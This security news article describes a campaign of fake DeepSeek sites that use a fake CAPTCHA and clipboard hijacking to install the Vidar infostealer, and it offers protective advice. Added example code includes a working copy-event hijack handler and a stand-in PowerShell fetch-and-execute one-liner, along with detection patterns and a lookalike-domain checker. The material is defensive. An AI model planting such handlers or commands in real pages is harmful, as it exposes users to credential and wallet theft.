Cybercriminals are exploiting the recent launch of the DeepSeek AI chatbot by building a network of fraudulent look-alike websites. Security researchers from ThreatLabz uncovered the campaign, which aims to install the Vidar information-stealing malware and harvest sensitive personal data. The scheme preys on the public's growing interest in new AI tools, turning curiosity into a real security risk.
A Wave of Imposter AI Websites Emerges
Within a month of the official launch of DeepSeek, a Chinese AI chatbot, malicious actors had already flooded the internet with convincing imposter sites. These websites are carefully designed to mimic the look and feel of the legitimate platform in order to lure unsuspecting visitors.
The primary goal of these fake sites is to deceive users into compromising their own security. Researchers identified several malicious domains actively participating in the campaign:
- deepseeksol[.]com
- deepseeksky[.]com
- deepseek[.]app
- deepseekaiagent[.]live
These sites promise AI-driven features but instead steer the visitor through a fake sign-up flow whose end result is malware running on their device.
How the Deceptive Scheme Unfolds
The attack is not immediate; it follows a multi-step process that builds false trust with the victim before striking. Presenting the malicious step as a routine part of signing up makes a successful infection more likely.
The criminals have engineered a specific sequence to trap users:
- The Registration Trap: The user is first prompted to create an account on the fake DeepSeek website.
- The Fake CAPTCHA: A phony "verify you are human" page appears; it is a front for the attack.
- Clipboard Hijacking: While the user is distracted by the verification steps, malicious JavaScript on the page silently writes a PowerShell command to their clipboard.
- Malware Execution: The page presents pasting and running that command as part of the verification. If the user does so, the command downloads and installs the Vidar info-stealer.
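The fake-CAPTCHA, paste-this-command pattern described above (commonly called ClickFix) is easiest to understand from both sides. The following is an added example, not code from the original article, from ThreatLabz, or from the campaign itself: it models how a `copy` event handler on the fake page replaces the user's clipboard contents with an attacker-chosen command, and pairs it with a heuristic that flags such clipboard text before it reaches a shell. The command string, the `example.invalid` host and all function names are constructed for this example; the campaign's real PowerShell is not reproduced.

```javascript
// Added example: not code from the original article, ThreatLabz, or the
// campaign. It shows (1) how a "copy" handler on a fake CAPTCHA page swaps the
// user's clipboard contents for an attacker-chosen command, and (2) a
// heuristic that flags such text before it is pasted into a shell.
// STAND_IN_COMMAND is a constructed, harmless stand-in (example.invalid never
// resolves); the campaign's real PowerShell is not reproduced.

const STAND_IN_COMMAND =
  'powershell -w hidden -ep bypass -c "iwr http://example.invalid/x.ps1 | iex"';

// Attacker side. In a browser this is registered with
// document.addEventListener('copy', handler): it cancels the default copy of
// the visible selection and writes the hidden command to the clipboard instead.
function makeClipboardHijackHandler(command) {
  return function onCopy(event) {
    event.preventDefault(); // discard what the user actually selected
    event.clipboardData.setData('text/plain', command);
  };
}

// Minimal model of the browser's copy event so the handler can run under Node.
// Returns what the clipboard would hold afterwards and whether the real copy
// was suppressed.
function simulateCopy(handler, selectedText) {
  let clipboard = selectedText;
  let defaultPrevented = false;
  handler({
    preventDefault() { defaultPrevented = true; },
    clipboardData: {
      setData(type, value) { if (type === 'text/plain') clipboard = value; },
    },
  });
  return { clipboard, defaultPrevented };
}

// Defender side: traits shared by download-and-execute one-liners. Two or more
// hits are treated as suspicious so that an ordinary snippet copied from
// documentation (a single curl, "powershell Get-Date") is not flagged.
const PAYLOAD_SIGNS = [
  { name: 'powershell', re: /\bpowershell(\.exe)?\b/i },
  { name: 'hidden-window', re: /-w(indowstyle)?\s+hidden\b/i },
  { name: 'encoded-command', re: /-e(nc|ncodedcommand)?\s+[A-Za-z0-9+\/=]{20,}/i },
  { name: 'invoke-expression', re: /\b(iex|invoke-expression)\b/i },
  { name: 'download-cradle', re: /\b(iwr|invoke-webrequest|curl|wget|certutil|mshta|bitsadmin)\b/i },
  { name: 'policy-bypass', re: /-(ep|executionpolicy)\s+bypass\b/i },
];

// Returns { suspicious, matched } for a piece of clipboard text.
function classifyClipboardText(text) {
  const matched = PAYLOAD_SIGNS.filter((s) => s.re.test(text)).map((s) => s.name);
  return { suspicious: matched.length >= 2, matched };
}
```

Running `simulateCopy(makeClipboardHijackHandler(STAND_IN_COMMAND), 'I am not a robot')` shows the user's selection replaced wholesale, which is why the advice to paste into a text editor before a terminal matters: the text that lands there is what `classifyClipboardText` would score. The two-hit threshold is a deliberate trade-off; an endpoint control that hooks the Run dialog or PowerShell host can afford to be stricter than a browser-side nudge.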
Vidar Malware and Its Sinister Purpose
The payload in this attack is Vidar, a well-known and potent information stealer. Its purpose is to quietly extract as much valuable data as possible from an infected computer: saved passwords, personal files, browser cookies and session data, and cryptocurrency wallets.
To make the operation harder to shut down, the threat actors use the Telegram messaging platform to manage their command-and-control (C2) infrastructure, which lets them direct the malware and receive stolen data covertly. The malware actively hunts for crypto wallet data by searching known file paths and registry keys, putting digital assets at immediate risk.
Expert Advice on How to Stay Protected
The rise of fake AI websites is a growing trend, but users can take several steps to protect themselves. Security experts emphasize that vigilance and basic security hygiene are the best defenses against these impersonation attacks.
To reduce your risk of falling victim, follow these recommendations:
- Verify Website Authenticity: Always check the full URL before signing up. Stick to the official DeepSeek website and be suspicious of unfamiliar or slightly different domains: extra words added to the brand, a different top-level domain, or the brand name buried in a subdomain of some other domain.
- Be Cautious with Commands: Never paste a command from a website into PowerShell or a terminal window unless you are certain of the source and understand what it does. No legitimate sign-up or CAPTCHA requires running a command on your machine; if in doubt, paste the clipboard contents into a plain text editor first and read them.
- Enable Strong Security: Ensure you have reputable antivirus and endpoint detection software installed and kept up to date.
- Watch for Red Flags: Be wary of unexpected registration forms or unusual CAPTCHA requests, especially on new or lesser-known sites.
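The domain-verification advice above can be turned into a concrete check. The following is an added example, not code from the original article or from DeepSeek: it reduces whatever a user pastes (a full URL, a defanged indicator such as `deepseeksol[.]com`, or a bare host) to a hostname and classifies it as the legitimate site, a brand lookalike, or unrelated. It assumes the official registrable domain is `deepseek.com`, and its "last two labels" rule for the registrable domain is a simplification that ignores multi-part public suffixes such as `co.uk`; all function names are constructed for this example.

```javascript
// Added example: not code from the original article or from DeepSeek.
// Classifies a hostname or URL as the legitimate DeepSeek site, a brand
// lookalike, or unrelated.
// Assumptions: the official registrable domain is deepseek.com, and the
// "last two labels" rule for the registrable domain is a simplification that
// ignores multi-part public suffixes such as co.uk (use a public-suffix list
// in production).

const OFFICIAL_DOMAIN = 'deepseek.com';
const BRAND = 'deepseek';

// Reduce whatever a user pastes (full URL, defanged IOC, bare host) to a
// lowercase hostname.
function hostnameOf(input) {
  let s = input.trim().toLowerCase().replace(/\[\.\]/g, '.'); // undo defanging
  s = s.replace(/^[a-z][a-z0-9+.-]*:\/\//, ''); // scheme
  s = s.split(/[\/?#]/)[0];                      // path, query, fragment
  s = s.replace(/^[^@]*@/, '');                  // userinfo
  s = s.replace(/:\d+$/, '');                    // port
  return s.replace(/\.$/, '');                   // trailing dot
}

// Simplified registrable domain: the last two labels.
function registrableDomain(host) {
  return host.split('.').slice(-2).join('.');
}

// Returns { host, verdict, reason } with verdict one of
// 'official' | 'lookalike' | 'unrelated'.
function classifyHost(input) {
  const host = hostnameOf(input);
  const registrable = registrableDomain(host);
  if (registrable === OFFICIAL_DOMAIN) {
    return { host, verdict: 'official', reason: 'registered under ' + OFFICIAL_DOMAIN };
  }
  // Homoglyph domains reach the resolver as punycode and never contain the
  // ASCII brand string, so any xn-- label deserves a manual look.
  if (host.split('.').some((label) => label.startsWith('xn--'))) {
    return { host, verdict: 'lookalike', reason: 'punycode label (possible homoglyphs)' };
  }
  // Brand name anywhere else: extra words, a different TLD, or the brand
  // buried in a subdomain of someone else's domain.
  if (host.includes(BRAND)) {
    return { host, verdict: 'lookalike', reason: 'contains "' + BRAND + '" but is registered as ' + registrable };
  }
  return { host, verdict: 'unrelated', reason: 'no relation to ' + OFFICIAL_DOMAIN };
}

// The domains named in the article, as a reader would paste them.
const REPORTED_DOMAINS = [
  'deepseeksol[.]com',
  'deepseeksky[.]com',
  'deepseek[.]app',
  'deepseekaiagent[.]live',
];

function verdictsFor(inputs) {
  return inputs.map((i) => classifyHost(i).verdict);
}
```

All four domains listed earlier come back as `lookalike`, while `https://chat.deepseek.com/sign_in` is `official` because only the registrable domain is compared, not the subdomain. The same logic catches `deepseek.com.verify-login.example`, where the brand sits in a subdomain of an unrelated registrable domain, which is a trick a plain "does it start with deepseek.com" check would miss.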
Organizations are also urged to train their employees to recognize phishing attempts and brand impersonation schemes, as they are a common entry point for wider network breaches.